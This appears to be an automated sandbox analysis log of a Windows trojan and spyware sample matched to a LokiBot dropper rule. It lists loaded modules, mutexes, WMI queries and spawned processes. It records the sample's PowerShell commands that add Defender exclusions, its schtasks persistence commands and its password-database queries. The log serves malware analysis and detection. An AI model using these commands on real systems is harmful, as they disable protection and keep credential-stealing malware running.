Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770BB2	11_2_02770BB2
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_027708E7	11_2_027708E7
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770917	11_2_02770917
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770E1B	11_2_02770E1B
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770C59	11_2_02770C59
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770CAB	11_2_02770CAB
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770D6A	11_2_02770D6A
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770D58	11_2_02770D58
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_02770DFA	11_2_02770DFA
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Code function: 11_2_027735A0	11_2_027735A0

Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2103476200.0000000003F09000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000000.2036728378.0000000000402000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUwGv.exe0 vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2108503550.0000000007DFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2101583360.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameflaggiest.exe vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2108087717.00000000076A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2102675046.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs yMvZXcwN2OdoP6x.exe
Source: yMvZXcwN2OdoP6x.exe	Binary or memory string: OriginalFilenameUwGv.exe0 vs yMvZXcwN2OdoP6x.exe

Source: yMvZXcwN2OdoP6x.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: yMvZXcwN2OdoP6x.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: LjlEiSlJe.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, O76oEJAdf3ugVbiFUb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, O76oEJAdf3ugVbiFUb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, O76oEJAdf3ugVbiFUb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, O76oEJAdf3ugVbiFUb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yMvZXcwN2OdoP6x.exe.42e93f0.7.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: _0020.AddAccessRule
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yMvZXcwN2OdoP6x.exe.4232dd0.6.raw.unpack, wnwYX3cihVFWvaiD12.cs	Security API names: _0020.AddAccessRule

Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: (K@*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: LjlEiSlJe.exe	Binary or memory string: *\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: yMvZXcwN2OdoP6x.exe, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: D*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/73@2/2

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Mutant created: \Sessions\1\BaseNamedObjects\ECgVrCUOakctc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File created: C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp

Jump to behavior

Source: yMvZXcwN2OdoP6x.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yMvZXcwN2OdoP6x.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yMvZXcwN2OdoP6x.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogganchedTSADAsTxnerPUZbggalesaurus.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: yMvZXcwN2OdoP6x.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

File read: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmpFFDD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Process created: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe "C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjlEiSlJe" /XML "C:\Users\user\AppData\Local\Temp\tmp18B4.tmp"
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Process created: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe "C:\Users\user\AppData\Roaming\LjlEiSlJe.exe"

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Section loaded: sspicli.dll	Jump to behavior
